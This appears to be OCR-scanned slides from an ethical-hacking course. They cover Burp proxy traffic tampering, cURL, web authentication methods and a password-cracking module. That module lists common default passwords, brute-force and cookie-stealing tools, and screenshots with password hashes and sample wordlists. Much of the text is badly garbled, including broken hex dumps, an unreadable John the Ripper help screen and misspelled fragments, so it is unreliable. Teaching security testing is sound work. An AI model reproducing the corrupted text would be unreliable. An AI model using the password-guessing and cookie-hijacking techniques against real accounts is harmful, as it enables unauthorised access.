
55 


53 


3b 


20 


72 


K 1686; en-US; r 




7 


76 


3a 


31 


2e 


32 


2e 


31 


29 


20 


47 


65 


63 


6b 


6f 


2f 


32 


v:1.2.1) Gecko/2 


8 


30 


30 


32 


31 


32 


30 


34 


Od 


Oa 


41 


RT RT Rf^ 


7n 


74 


3a 


0021204Accept: 


9 


20 


74 


65 


78 


74 


2f 


73 


6d 


6c 


2c 


Insert byte 


69 


63 


texfxml.applic 


a 


61 


74 


69 


6f 


6e 


2f 


73 


6d 


6c 


2c 


Insert bytes ... 
Insert string ... 


69 


63 


ation/Kml.applic 


b 


61 


74 


69 


6f 


6e 


2f 


73 


68 


74 


6d 


6c 


2c 


ation/yhtml+xml, 


c 


74 


65 


73 


74 


2f 


68 


74 


6d 


6c 


3b 


39 


2c 


te)(t/html;q=0.9, 


d 


74 


65 


73 


74 


2f 


70 


6c 


61 


69 


6e 


Delete byte 


2e 


38 


te)(l/plain;q=0.8 


e 


2c 


76 


69 


64 


65 


6f 


2f 


78 


2d 


6d 


6d 


61 


,video/y-mng,ima 


f 


67 


65 


2f 


70 


6e 


67 


2c 


69 


6d 


61 










70 


65 


ge/png,image/jpe 


10 


67 


2c 


69 


6d 


61 


67 


65 


2f 


67 


69 


66 


3b 


71 


3d 


30 


2e 


g,image/gif;q=0. 


11 


3? 


?c 


74 


65 


73 


74 


?f 


63 


73 


73 


?c 


7h 


?f 


7h 


3h 


71 


2.te>ft/css.*P:a 



Burp proxy allows the attacker to nnodify i ntercepted traffic i n 
both text and hexadecimal form, so even transfers of binary 
data can be manipulated. 
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Burp Proxy: Browser 
Request History 



Access to 



• burp proxy v 1.0 - Moz 


1^ 1 






File Edit View Go Bool<;marks Tools Window Help 






^ http://burp/ 


Search 




M 1 



burp prosy vl.O 
by Ports wigger 



clear caclie 



tsirget 



method 



URL 



modified? 



http : www.hotmail. com: SO 



GET 



http : lo ginnet.p as sp ort. com: 80 



GET 



/lo gjn. srf?id=2 &s vc=msdl&cbid=2432 5 



srf 



&mspp jph= 1 &tw =0 &f s= 1 &f s a= 1 &f s a 



t= 1296000 &Ic= 1033 & lana^EM 



http:logLn.passport.net; 80 



POST 



/uiloEin.srf?id=£ 



http : cb .msn. com: 80 



GET 



/passport/cbhm .js.ashx?PP SERV1CE=1 



ogin&PP PAGE=ppSwltchUser&lLd= 



1033 



srf 



ashs 



modified 



http s : lo gin.p as sp ort. com: 443 



POST 



/pp s ecure/p 0 St. srf?lc= 1033 &id=2 &tw= 



srf 



20 &f s= 1 &cbid=2432 5 &da=p as sp ort 



. com&kpp=2 &s vc^mail&mspp jph= 1 



Done 



Burp proxy mai ntai ns a complete history of every request sent by 
tine browser. 
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Hacking Tool: cURL 



http://curl.haxx.se 

©cURL is a multi- protocol transfer library 

©It is a client side URL transfer library supporting FTP, 
FTPS, HTTP, HTTPS, GOPHER, TELNET, DICT, FILE, 
and LDAP 

©cURL supports HTTPS certificates, HTTP POST, HTTP 
PUT, FTP uploading, Kerberos, HTTP form- based upload, 
proxies, cookies, user+password authentication, file 
transfer resume, http proxy tunneling, and more 




Proof of Concept^— ^ ^ , 

^^^^M Copyright © by BC-Cbunc 1 1 
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Screenshot: cURL 



;url 
I sage 
)pt io 

-a/- 

-c/'- 
-Q/- 



-F^- 

-HX- 
-i/- 
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7.10 <uin32> libcurl^7.10 
: curl [options...] <url> 

ns: CH> means HTTP/HTTPS only, <F> means FTP only 
-append Append to target file uhen uploading <F> 

—user— agent <string> User— Agent to send to seruer <H> 

—cookie <name=strlng/f lle> Cookie string or file to read cookies from <H> 
— use— ascli Use flSCII^text transfer 

—cookie— jar <flle> Urlte all cookies to this file after operation <H> 
—continue— at <offset> Specify absolute resume offset 
-data <data> HTTP POST data <H> 
-data-ascll <data> HTTP POST ASCII data <H> 
-data-binary <data> HTTP POST binary data CH> 
—disable— epsu Prevents curl from using EPSU <F> 
—dump— header <flle> Urlte the headers to this file 
-egd-flle <flle> EGD socket path for random data <SSL> 
— referer Referer page <H> 

—cert <cert [ :passud]> Specifies your certificate file and password <HTTPS> 
-cert-type <type> Specifies certificate file type <DEP/PEM/ENG> CHTTPS> 
—key <key> Specifies private key file <HTTPS> 

-key-type <type> Specifies private key file type <DER/PEM/ENG> CHTTPS> 
—pass <pass> Specifies passphrase for the private key <HTTPS> 
—engine <eng> Specifies the crypto engine to use <HTTPS> 
— cacert <flle> CA certlf elate to verify peer against <SSL> 
— capath <dlrectory> CA directory <made using c_rehash> to verify 

peer against <SSL, NOT Ulndous> 
—ciphers <llst> Uhat SSL ciphers to use <SSL> 

—compressed Request a compressed response <uslng deflate>. 
—connect— t Imeout <seconds> Maximum time alloued for connection 
-crlf Convert LF to CRLF In upload. Useful for MUS <OS/390> 

—fall Fall silently <no output at all> on errors <H> 

-form <name=content> Specify HTTP POST data <H> 

— globoff Disable URL sequences and ranges using and [] 

-get Send the -d data with a HTTP GET <H> 

—help This help text 

—header <llne> Custom header to pass to server. <H> 
-Include Include the HTTP-header In the output <H> 

-head Fetch document Info only <HTTP HEAD^FTP SIZE> 

—junk— sess Ion— cookies Ignore session cookies read from file <H> 
—Interface <lnterface> Specif v the Interface to be used 
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— cacert 
— capath 



using 
<H> 



server. 



-Include 
—head 



Carnivore 



© Carnivore is an FBI assistance 
progrann 

© 1 1 captures al I E mai I messages 
to and from a specific user's 
account 

© Carnivore eavesdrops on 
network pacl<ets, watching 
them go by, then saves a copy 
of the packets i t i s i nterested 
in (passive sniffer) 
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Proof of Concep 



Filler Set? 





Picture Source: 

http: / / www. pol i tr i x.org/ f oi a/ cam i vore' earn rO 3.j 

pg 
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Summary 



© Web appi i cati ons are cl i ent/ server software 
applications that interact with users or other systems 
using HTTP 

© Attacl<ers may try to deface the Website, steal credit 
card information, inject malicious codes, exploit 
server si de scri pti ngs, etc. 

© Command injection, XSS attacks, Sql I njection. Cookie 
Snooping, cryptographic I nterception. Buffer 
Overflow, etc. are some of the threats agai nst web 
applications 

© Organization policies must support the 
counter measures agai nst al I such types of attacks 
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Ethical Hacking 



ModuleXIII 

Web- Based Password Cracking 
Techniques 



Scenario 



I 



Cracking accounts, stealing files, defacing websites is just a click away for Raven. All of these 
illegal activities give him a kick. He uses his skills to nnake nnoney for his living. He has a 
website where people can request him to do all manner of things such as cracking email 
accounts, enumerating accounts and lots more; whatever the requester wants to get from any 
website. All of this is done only after the payment is made and he charges a minimal amount. 
Raven is a hit among the underground community. 

However, the users have to give their email I Ds to get the information on his online request 
form. 

Raven's first encounter with cracking was just after he had graduated, but was unemployed. He 
had read about cracking techniques on the net and about crackers who offer services for 
money. This catch lured Raven to bea cracker. Hisfirst victim was his friend's email account. 

H e used a brute force attack when the dictionary attack failed. After a few attempts. Raven was 
successful in cracking his friend's password. Thus, Raven'sjourney of illegal activities began. 

H ow far can he go? 

What if he masters other activities such as generating malicious codes to disrupt systems on 
the net or cracki ng the passwords of Government agencies? 
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Modu e Objectives 




I 



© Authentication - Definition 

© Authentication Mechanisms 

© What is a Password Cracl<er? 

© M odus Operandi of an Attacl<er Using Password 
Cracl<er 

© H ow does a Password Cracl<er worl<? 
© Attacl<s- Classification 
© Password Cracl<i ng Tool s 



© Countermeasures 
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Modu eF ow 




Understanding 
Session Hijacl<ing 





Spoof i ng vs. H i j acl<i ng — i 




TCP 3- Way 
liandshal<e 



Session Hijacl<ing 
Tools 
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Authentication - Definition 



© Authentication is the process of determining the 
user's identity 

© I n private and public computer networl<s, 
authentication is commonly done through the use of 
login I Ds and passwords 

© Knowledge of the password is assumed to guarantee 
that the user is authentic 

© Passwords can often be stolen, accidentally revealed, 
or forgotten due to i nherent loopholes i n this type of 
authentication 
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Authentication ivieclianisms 



© HTTP Authentication 

• Basic Autlienti cation 

• Digest Authentication 

© I ntegrated Windows (NTLIV| ) Autlienti cation 

© Negotiate Autlienti cation 

© Certificate- Based Authentication 

© Forms- Based Authentication 

© M i crosoft Passport Authenti cati on 
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HTTP Authentication 



© There are two techniques for HTTP authentication. 
They are: 

• Basic 

• Digest 
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Basi c Authenti cati on 



I 



© 1 1 i s the most basi c form of 
authenti cati on avai I abl e to web 
applications 

© 1 1 begi ns wi th a cl i ent mal<i ng a 
request to the web server for a protected 
resource, without any authentication 
credentials 

© The limitation of this protocol is that it 
is wi de open to eavesdroppi ng attacks 

© The use of 128- bit SSL encryption can 
thwart these attacks 



Enter Network Password 



Please type youruser name and password. 

Site: www.regsoft.net 

Realm RegScft.comVendor Area 



User Name jmyuserid 
Password 



l~ S3y.6..th.is..fi.a.ssword in^y^ 



0< 



Cancel 



Picture Source: 

littp :/ / www. robof orm. com/ pi cs/ basi cautli . g 
if 
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J 



D i gest Authen t i cat i on 



© 1 1 i s desi gned to provi de a 
higher level of security vis-a-vis 
Basic authentication 

©It is based on challenge- 
response authenti cati on nnodel 

©It is a significant improvement 
over Basic authentication as it 
does not send the user's cleartext 
password over the network 
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Add/Edit Listeners 



? X 



Server: I FAST ISA SERVER 

IP Address: 
Display Narme: 

|~ Use a server certificate to authenticate to web clients 



Select.. 



r Authentication 

Basic with this domain: 



L- ^ 


Select domain... | 


Digest with this domain: ^ 




t- 


Select domain... | 



Integrated 

|~ Client certificate (secure channel onlij) 



OK 



Cancel 
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Integrated Windo\A 
Authentication 



©It uses M icrosoft's proprietary NT 
LAN Manager (NTLM) 
authentication program over HTTP 

©I t only works with M icrosoft's 
I nternet Explorer browser and 1 1 S 
web servers 

©I ntegrated Windows 
authentication is more suitable for 
intranet deployment 

©In this type of authentication, no 
version of the user's password ever 
crosses thewi re 
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Authenticatidn Methods 



Ancmiiimous access 

No user narme/'password required to access this resource. 

AccoLTit used for anoniJmous access: 

User name: |lUSR_ECCOUNCIL Brome... | 

Passivofd: 

W Allow IIS to control password 

-Authenticated access 

For the following authentication methods, user name and password 

are required when 

■ anonymous access is disabled, or 

- access is restricted using NTFS access control lists 

f~ Digest authentication for Windows domain servers 

I Basic authentication [password is sent in clear text) 



Default domain: I Select... 
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N egoti ate Authenti cati on 



© It is an extension of NTLIV| autlientication 

© It provides Kerberos- based authentication 

© 1 1 uses a negoti ati on process to deci de on the I eve! of 
security to be used 

© This configuration is fairly restrictive and uncommon 
except on corporate i ntranets 
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Certificate- Based Authentication 



©It uses public key cryptography and a 
digital certificate to authenticate a user. 

©It is considered an inriplementation of 
two-factor authentication. I n addition 
to sonnething a user knows (password), 
he must authenticate with a certificate. 

© 1 1 i s possi bl e to tri ck the user i nto 
accepti ng a spoofed certificate or a fake 
certificate. 

©Very few hacking tools currently 
support client certificates. 



CerUficate 



General | Details | Certification Path | 



Certificate Inrormation 



This certificate is intended for tfie following purpose(s): 

• Ensures software came from software publisher 

• Protects software from alteration after publication 

• Windows Hardware Driver Verification 



Issued to: (Microsoft Windows Hardware Compatibility 



Issued by: Microsoft Root Authority 



Valid from 10/1/1997 to 12/31/2002 




Issuer Statement 



OK 
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Forms- Based Authentication 



gw-paris : User Authentication Rule Properties ■ 



ill 



User Authentication Rule | 
Radius Options Agent Options 



Log Settings 
Restrictions 



General 

Login Type: 
Realm String: 
HTML Directorv: 



FORM 



3 



The HTML DirectoriJ is used in order to customize the 
pages, which are presented to the user at 
authentication time. Leave this blank in order to use 
the default pages. The HTML root directoriJ is 
specified in the Firewall properites options tab. 



OK 



Cancel 



AppliJ 



©It does not rely on features 
supported by the basi c web 
protocols like HTTP and SSL 

©It is a highly customizable 
authentication nnechanisnn that 
uses a fornn, usual I y connposed of 
HTML 

©It isthennost popular 
authentication technique 
deployed on the I nternet 
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M icrosoft Passport Authentication 



I 



©Single sign-on is the term used to 
represent a system whereby users 
need only remember one user name 
and password, and be authenticated 
for multiple services 

©Passport was M icrosoft's universal 
single sign-in (SSI) platform 

©It enabled the use of one set of 
credentials to access any Passport 
enabi ed si te such as M SN , H otmai I , 
and MSN Messenger 

©M icrosoft encouraged third-party 
companies to use Passport as a 
Universal authentication platform 
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1 .NET Passport Sign-in 


He! 


I 





E-mail Address hanne@hotnnail,conn 



p ^ g g ^1 J Q |j ^ j tfi tfs tf: jf: tfi tfs tf: jf: 

[~ 5ign me in automatically, 

Sign In 



Do not remember my e-mail address for future sign-in, 
(Select this when using a public computer,) 

.net 



Don't have a ,NET Passport? Get one now. 
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What I s A Password Cracker? 



I 



© According to Maximum Security definition, "A 
password cracl<er is any program tliat can decrypt 
passwords or otiierwise disable password protection" 

© Password cracl<ers use two pri mary metliods to 
identify correct passwords: brute- force and dictionary 
searclies 

© A password cracl<er may also be able to identify 
encrypted passwords. After retrieving the password 
from the computer's memory, the program may be 
able to decrypt it 
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M odus Operandi of an Attacker U si ng 
Password Cracl<er 



© Tlie ai nn of a password cracker is nnostly to obtai n the 
root/adnninistrator password of the target systenn 

© The adnni nistrator right gives the attacker access to fi les and 
applications and can install a backdoor such as a trojan for 
future access to the system 

© The attacker can also i nstal I a network sniffer to sniff the 
i nternal network traff i c so that he wi 1 1 have nnost of the 
infornnation passed around the network 

© After gai n i ng root access, the attacker escal ates pr i vi I eges to 
that of the ad mi nistrator 

© I n order to crack passwords efficiently, the attacker should use 
a system which has a greater computing power 

Copyri ght © by BC-Cbunc i I 
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H ow Does A Password Cracker Work? 
I 



© To understand how a password cracker works, it is 
better to understand the worki ng of a password 
generator. M ost of them use some form of 
cryptography. 

© Cryptostemsfrom the Greek word kryptos. Kryptos 
was used to descri be anythi ng that was hidden, 
obscured, veiled, secret, or mysterious. Graph is 
derived from graphi a, which means writing. 
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H ow Does A Password Cracker Work? 
2. 



© Cryptography is concerned with the ways in which 
communications and data can be encoded to prevent 
disclosure of thei r contents through eavesdroppi ng or 
message interception, using codes, ciphers, and other 
methods, so that only certai n peopi e can see the real 
message. 

© Distributed cracking is where the cracker runs the 
cracking program in parallel, on separate processors. 
There are a few ways to do this. One is to break the 
password fi le i nto pieces and crack those pieces on 
separate machines. 
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H ow Does A Password Cracker Work? 
3. 



© The wordlist is sent through the encryption process, 
generally one word at a time. Rules are applied to the 
word and, after each such application, the word is 
again compared to the target password (which is also 
encrypted). If no match occurs, the next word is sent 
through the process. 

© I n the final stage, if a match occurs, the password is 
then deemed cracked. The plain-text word is then 
piped to a file. 
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Attacks - Classification 



© The various types of attacks that are performed by 
the hacker to crack a password are as follows: 

• Dictionary attack 

• Hybrid attack 

• Brute force attack 
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Password Guessing 



© Password guessi ng attacks can 
be carried out manually or via 
automated tools 

© Doi ng soci al engi neeri ng on 
the victim may also 
someti mes reveal passwords 

© Password guessing can be 
performed against all types of 
web authentication 

The common passwords used are: root, administrator, 
admin, operator, demo, test, webmaster, bacl<up, guest, 
trial, member, private, beta, [company_name] or 
[ l<nown_ username] 
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Password Guessi 



© M ost of the users assi gn 
passwords that are related 
to thei r personal I ife such as 
father's middle name, as 
shown i n the screenshot 

© An attacker can easily fill 
out the form for forgotten 
passwords and retrieve the 
same 

©This is one of the 

si mpl est ways of password 

guessing 
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a Wekone to Yahoo! - MKrosoft Internet EKplorer 












File Edit View Favorites Tools Help 


D 




' 4 - ® gl ffl ©Search ^Fawites ^ 


?Media Q 1 


i @ ' i ^ # 








Address 


^hi:tp://edilyahoo,corfi/config/evd_regi£ter?,v=£^,ini:l= 


Sinew=lS(,done= 


A,5rc=ym&i,pari:ner=&i,p=&prorfio=£ 


,last= 




Liib » 


Google- 1 Jl ^Search Web - \ 


^ PageRark 


0340 blocked f|ftutoFii [] 


1 ^Options ^ 







flDone 



YlSoOllVlail; 



Yahoo! -Help 



Sign up for your Yahoo! ID with Maii ^^^^^^^Aiready have an id? sign in 

Gel a Yahoo! ID and password for access to Yahoo! Mail and all other personalized Yahool sen/ices. 



Yahool iD: |peterar0338877 @yahoi).com 
Examples: "dairymanSS" or "free2rhvnie" 
Password: I™ 



Choosing your ID 

Vou will use tfiis Information to access 
Yanool eacntlme. Captalizatlon t^atters 
for your passwordi 



I^Ljst be six ctiaracters or mere 



Re-type Password: 



If you forget yoyr password or need help with your account, you'll need to confirm the Recalling your passworil 



following Information: 

Security Question: |Whal is your father's middle name? 

Your Answer |peter 

Birthday: | tvlarch 

Current Email (Optional): 



1\ 



This inf ortnation is our only way to verify 
your identity. To protect your account, 
mke sure "Your Answer" is 
memorable for you but hard for 
others to guess! 



(MDD.YYYY) 



Account notices will be sent to this email address, including new 
password requests. 



First Name: 



Last Name: 



Language £ Content: | English -United States ^ 
ZIP/Postal Code: [m Gender: | male J 



Customizing Yahoo! 

Yahoo! will try to provide more relevant 
content and advertising based on the 
information collected on this page and on 
the Yahoo! products and services you 



Industry: Computers/Electronics 



Title: Analyst 



Specialization: 

PeOt5le Search LIStina: C l idmvnPMfV^hnniyallaHHrP^^fnrfrPP 



I I I |9 Unknom Zone [Mixed) 
v-.upyi lyi iL uy l-v^-v-a^ui i^ii 
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Query Stri ng 



© The query stri ng is the extra bit of data i n the URL 
after the question nnarl< (?) that is used to pass 
variables 

© The query stri ng is used to transfer data between cl ient 
and server 

Exannple: 

http://www.nnai I .com/ mai I .asp?nnai I box=sue&connpa 
ny^bc%20com 

Sue's nriai I box can be changed by changi ng the U RL to: 

http://www.nnai I .com/ mai I .asp? mai I box=3oe&compan 
y^bc%20com 
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Cooki es 



■ 



© Cookies are a popular 
form of session 
management 

© Cool<ies are often used to 
store i mportant f i el ds 
such as user names and 
account numbers 

© All the fields can be easily 
modified using a program 
I i ke Cooki eSpy 
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(^i' Camtech's CT Cookie Spy v2.0 



CT Cookie Spy 2.0 



C:\Documents and SeHinqs 



Number of Cookies Found: 113 



"3 

Delete 



Where they came from: 



128.242.232.142/ 



Date Installed: 1 2/25/2002 G:1 G:05 PM 
Date Expires: 12/26/2002 5:16:06 PM 
Cookie Life: 0 year 23 hours, 0 minutes, 1 second 



About 




Mailing List 




Close 1 
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Dictionary Maker 



Dictionary 



Dictioriary: 
File: 



Unjx|l 



C:\downloads\H-MDictionaries.zip 
Create Load... 



Close 



Save.. 



rS tatus: 

Size (bvtes): ^^^^^^ 
Size (words):10G187 



~ Dic^i□na^^) charset: 



abcdef ghijklmnopqrstuv WHVzAB CDEFGHIJKLMNOPQRST U\AA/XTZaaaaaa,aef eeeei 1 1 1'Snoooob-^BUui! 



r Files to process: 




r Options: 

[7 Case register 



Clear results 



r Results: 

Current file name: H-MDictionaries.zip 

Current file size: SG9S57 

Total words: 70540 

Checked words: 47496 

Work speed: Processing... 



Progress: 



29^ 



About 



Processing... 



Dictionary files can be downloaded from the I nternet or can be generated 
manually 
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Password Cracke 



©LOphtcrack 

©J ohn The Ripper 

©Brutus 

©Obi wan 

©Authforce 

©Hydra 

©Cain And Abel 
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©WebCracl<er 

©Munga Bunga 

©PassList 

© ReadCool<i es. html 

©SnadBoy 

©WinSSLMiM 

©RAR 

©Gammaprog 
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LOphtcrack 



©LC 4 is one of the 
most popular password 
crackers avai I abl e 

©LC 4 recovers 
Windows user account 
passwords to access 
accounts whose 
passwords are lost or 
to streamline 
migration of users to 
other authentication 
systems 
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||^@stakeLC4-[Untitled2] 










File View Import Session Help 


'ill IcSHH ■§!/.: 


n 0 4- 1 ► im 


MS IS 







^Administrator 
^aschmidt 

.[^ekarofsky 
^suest 

rrhfiynR 



Ready 



<8 I NTLW Password 



I LM Hash 



02A55BlC2530A543AAD3B«5B5HmEE 
E52CAC67419A9A224A3B10SF3FA6CB6D 
E52CAC67419A9A224A3B10SF3FA6CB6D 
E52CAC67419A9A224A3B10SF3FA6CB6D 
J J 5B02FDD71 21 D6FAAD3B4-35B5 1 101EE 



Auditing Options For This Session 



■Diclioriarv Cfack- 
|7 lEnabled 



Dictionaiv LisI 



The Dictionaiv Crack tests lof passwords lhat are the same as the words listed in the 

word file. This test is very ioA and finds tlic vvcokcst passwords, 



■Dictionarv/Brute H^ibiid Cfack- 
|7 Enabled 



[l ^ Characters to prepend 
|z ^ Characters to append 

\~ Common letter substitulions [much slower] 

The Dictionaiii/Biute Hybrid Crack tests for passmrdsthat are variations ol the words in 
the word file. It finds passwords such as "Dana99" or "monkevsl". Tfiis test is fast and 
finds weak passwords. 



Brule Force Crack- 
|7 Enabled 
|7 IJislribuled 



Character Set: 



|A -Z. U ■ y and mUT[\-_+='-\\{]\\:roJ/ 
Custom Ctiaracter Set (list each ctiaracter]: 



3 



Part 



Usii. Brute Force Characters 



The Brute Force Crack tests for passwords that are made up of the characters spKified 
in the Character Set. It finds passwords such as "WeR3plt6s" or "vC5^G9+12b", This 
\>i'<A\i iluw dndfiriii^ iiiediuiiitu i;tiuriy pd^^wuiiiy. Spyuif}! d ufididUui ^et wilfi iiiuiu 
characters to crack stronqer p 



OK 



Cancel 




total users 



31 

5Udited_u5ens 
0 

y. done 



0. 000^ 



Jl 



■ \kei Infs audi 

■ Dicdonaiy 

■ BtUte Forci! 

stalce 
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©J ohn the Ripper is a 
password cracker for U N I X, 
DOS, WinNT, andWin95 

©J ohn can cracl< the foil owing 
password ci phers: 

• Standard and double- 
length DES- based 

• ESDI's extended DES- 
based 

• FreeBSD'sMDS- based 

• OpenBSD's Blowfish- 
based 

©J ohn the Ripper combines 
several cracking modes in one 
program, and is fully 
configurable 
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ir 



'f^ FlniihRH ■ Jnhn 



"nr>i! 



71 :il^lel ' -1 A I 



OoIiLi tli: Pid;ci- VcL-;ioLi 1,1 ^LP"^ I Cyyn-ji-M M 199(3 hj iola: D:;iuucr 
"."sajc; ichn [flats] [passud fil:;! 



-;ioiilc; -^f il:> . .; 

- 1 nc i: en e ti: a : [ : --Jiij te;- ] 
-:injlc 

-e3tT5:riaI:--™te;- 
-:c3t.crc[:■^^ilc>] 
-iiiakscriaifs :-^.Ilie^ 



3;cc;if7 t^ssvi file in 
^^cr(llls^^ nods, rssa cc 
:L:flikilc rules for Tordl 
l:r.cr2iiieni:f.L jncde [Ti3l:rj 

L-C5t::c ;c55icL [froLii 



>iLcliird3 alJcncdi 
rds ::r3iii ■;IlLe^ or stdlr. 
13 1 ii'ode 

oUti. Inl enc:v <]iiofl=> 
■ifilc^] 



-shells: [ \ '_<?':.s'.l> 
-icilt: ; [ \]<cy:.Tif-' 
-laiissalcs 



hccp gaict 
-^.onajue -^.oUasn 



3/.0TT cra::«cl ;as3Tord; 

rjatk: thi: !t/.c5:i user is i only 
7::ac^k ti3s::3 fl^h ihis (These) shell 'si otil: 



risi only 

(These) shell ;3i only 
flst <c3-:.Tity aticuut: only 



assTtme clearcejti: ;as3o:ords ue::e used e.s se.lis 
ihort ocrcioh oftcr i period cf Cm:^ mr.ut:!: 
llsT eac^h vort 



isccp cr den' t be:; uhc 
dcL' c Tise sexier TT lor 1 



n 2 parcuort i: fou:.d 
ocflr. najies cr he.sh isiloles 
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Brutus 



© Brutus is an 
online or remote 
password cracl<er 

© Brutus is used to 
recover val i d 
access tol<ens 
(usually a user 
name and 
password) for a 
given target 
system 
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X J Brutus - AET2 - www.hDDbie.net/brutus - (Januar3i 2000) 



File Tools Help 



Target 1 172.1 G.I 05.1 
"Connection Options ■ 



Port 80 




Type [HTTP (Basic Auth] Pause Stop Clear 



Connections Tirmeput 



10 




r UsePr. 



-HTTP (Basic) Options- 



Method [head 3 ^ KeepAlive 



-Authentication Options 

Use Username |7 Single User 



UserlD j admin 



j Brute Force ^ | 


Range | 


Distributed | 


J words, tut 




B roi-vse 



Positive Authenticafidrn Results 



Target 



Type 



Username 



Password 



Initialising... 

Target 172.16.105.1 verified 

Brute force will generate 1 1 881 378 Passwords. 

M aximum number of authent ication attem pts will be 1 1 381 376 




6.105.1 with HTTP (Basic AuthL 



3Z 



Timeout Reject AuthSeq Throttle Quick Kill 



1168738 



U:admin Piafuzj 



501 Attempts per second 



lEstimated 5:56:41 remaining 
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Obi wan 



© Obi wan is based on the simple challenge- response 
authentication mechanism 

© This mechanism does not provide for intruder 
I ockout or i mpose del ay ti me for wrong passwords 

© Obiwan uses wordlists and alternations of numeric 
or alphanumeric characters as possi bl e passwords 
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Authforce 



© Authforce i s an HTTP Basic Authentication brute 
forcer 

© U si ng var i ous methods, i t attempts to brute force user 
name and password pai rs for a site 

© 1 1 is used to test both the security of a site and to 
prove the insecurity of HTTP Basic Authentication 
based on the fact that users usually do not choose 
good passwords 
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Hydra 



© Supports several protocols I ike TEL NET, FTP, 
HTTP, HTTPS, LDAP, SMB, SMBNT, MYSQL, 
REXEC, S0CKS5, VNC, P0P3,IMAP, NNTP, 
PCNFS, ICQ, Cisco auth, Cisco enable, Cisco AAA 

© Through the paral I izing feature, this password 
cracker tool can be fast depending on the protocol 

© Thistool allows for rapid dictionary attacks and 
includes SSL support 
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Cai n &L Abd 



I 



© Cain & Abel is a password cracl<ing tool for M icrosoft 
operating systems 

© 1 1 al lows easy recovery of various ki nds of passwords by 
sniffing the network, cracking encrypted passwords 
using dictionary, brute force and cryptanalysis attacks, 
etc. 

© It contains a feature called APR (ARP Poison Routing) 
which enables sniffing on switched LANs by hijacking 
I P traffi c of multi pie hosts at the same ti me 
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©This program is 
intended to recover lost 
Dasswords for 
=lAR/WinRAR archives 
of versions 2.xx and 3.xx 

©The program cracl<s 
passwords by brute force 
method, wordlist, or 
dictionary method 

©The program i s abl e to 
save a current state 

©Estimated time 
cal cul ator a! I ows the user 
to configure the program 
more carefully 



0RAR Password Recovery vl.l RC5 - Unregistered 



Jnjxj 



Upen 



5tart 



5top Help Regi 




- Encrjipted file name: " 



C; \Program File5\Intelore\R AR-PR\example , rar 



Browse 



r Attack method:' 



Brul:e-force attack 



Brute-force | Booost-Up Engine | Dictionary | Options 
- Password Length 



Ivlinimal length: 
[vlaKimal length: 



■ Allowed Characters 

|7 Digits ( from '0' to '9' ) 

\7 Uppercase letters ( from A' to Z' ) 

\7 Lowercase letters ( from 'a' to ':' ) 

\7 Special symbols ( '!', ...) 

\7 All printable symbols 

|~ Custom symbol set: 

llntelore 



r Statistics 

Total passwords : 
Checked passwords : 
Current length : 
Average speed : 
Current password : 
Elapsed time: 
Remaining time : 



866495 

23570 

3 

4667 psw/sec 

1V9 

5s 

3m 



15:34 - RAR Password Recovery v1 .1 RC5 inltialiied 

15:34 - Unregistered version! 

15:35 - 'example.rar' succesfully loaded. 

1535 - Opening C\...\example.rar 

1535 - Detected RARMnRAR v2.x encryption... 

1 5:35 - Brute-force initialization... 

1535 -Starting... 



1 535 - Current password length 
1 5:35 - Current password length 
1 5:35 - Current password length 



isl 
is 2 
is 3 



I RAR Password Recovery vl.l RC5 I Unregistered I 
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Gammaprog 



© Gammaprog is a brute force password cracker for 
web- based email address. 

© 1 1 supports P0P3 cracl<i ng as we! I . 

© It provides for pi ping support. If thewordlist nameis 
stdin, the program will read from stdin rather than 
from a f i I e. 

© 1 1 consists of Wi ngate support for P0P3 cracki ng. 
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H acki ng Tool : WebCracker 



WebCracker is a simple 
tool that takes text I i sts of 
user names and passwords 
and uses them as 
dictionaries to implement 
Basic authentication 
password guessing 

©It keys on the "HTTP 302 
Object Moved" response to 
i nd i cate successf u I guesses 

© 1 1 wi 1 1 f i nd al I successful 
guesses given i n a user 
name/ password 





f YOU can enter user/pass cominations like this: 
ussrname:passwDr[l 
james :bond 

# When the file is used ss s usernsne file, it will 

# And of course if used as a password file, it will 



# special thanks to shadowcasT for these: 

asdf :zxcv 

asdf :fdsa 

qwerty:ytrewq 

qwerty:asdf 

zxcvb : bvcxz 

zxcvb:asdf 

qwerTy:7ycvb 
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Hacking Tool: MungaBunga 



Munga Bunga's HTTP Brute Forcer - Version 1.0.3 (Build 3) 



File Process Options Help 



fUmqn rtunQr/ti HTTP lirul/i Fsrc^ 



The Hackoloai) Network - httpi/Mww.hackolog^i.com 



tJsername to brute force 



Word List for Passwords 



Number of threads 



CAPrograrm FilesVHTTP Brute Forcer^pass.lst 
Definition File For HTTP and Server Information 
CAProgram FilesVHTTP Brute Forcer\encite.def 



Start from begining of 
password file. 

Start/continue brute force 
from the following password.. 



Start/continue brute force ' 
from passw.ord tiujTiber... 



These passwords are These passwords had Response received from the server for my last 
being processed now, errors, shall retr;^ later. I Response NT f^L codes here. ~ 



If disconnected from the internet, pause 
H process, reconnect to the internet, and 
resume with process, automaticallv. 

IB Don't retry passwords with errors. 

13 Don't process passwords with spaces. : 

1= Don't pro cess passw ords containing 
" less then I characters. 



" less then [5 | characters. 

n Don't proc ess passw ords containing 
1^ mnro hhor. 1 1 n I characters. 



■ more then 20 | characters. 

13 Process all passwords as lowercase. 



Form Method 



Status: Inactive 




I f s a brute forcer, which uses the HTTP protocol to estabi ish its 
connections 
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Hacking Tool: PassList 



i 

PassList is another character- based password generator 



C PASSLIST.TXT - Notepad 




_|n| x| 


Rie Edit Format View iHelp 



starwars ! 
starwars " 
starwar5# 
5tarwar5$ 
starwar5% 
starwarsfi 
starwars ' 
5tarwar5 ( 
starwars) 
; star war 5^ 
starwar5+ 
starwars , 
5tarwar5- 
starwars . 
starwars/ 
starwarsO 



» * * * Passlist.txt sfenerator for Brute » » « « 
"The truth is out there" 



bo you haue a fixed beginning? (¥/N): y 
Enter string: staruars 

Enter the maxinun number of randon characters per passuord: 2 



Generating passuords 

S Processing ... Please uait. 
Process ended 
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H acki ng Tool : Read Cooki es 



Reads cooki es stored on the computer. This tool can be 
used for steal i ng cooki es or cooki es hi j acki ng. 



Hackers can be your worst enemy... 




or your best of friend 



EC-Gouncil - Ethical Hacking Demonstration (Cookie IHijacking) 

Choose site to read cookies from: 

Suggestions' https://lQgin.passport.CDm/ | http://www.yahDQ.com/ | 



https://lDgin.passpQrt.com/ 

Read cookies Reset 



J 



Cookie: 

status: Waiting for input 
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Hacking Tool: SnadBoy 



http://www.snadboy.conn 

"Snadboy Revelation" turns back the asterisk in password 
fields to plain text passwords 
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'n SnadBoy's Revelation 



'Circled +' Cursor 

Drag to reveal password 



Check For 



Update j 



About 



Exit I 



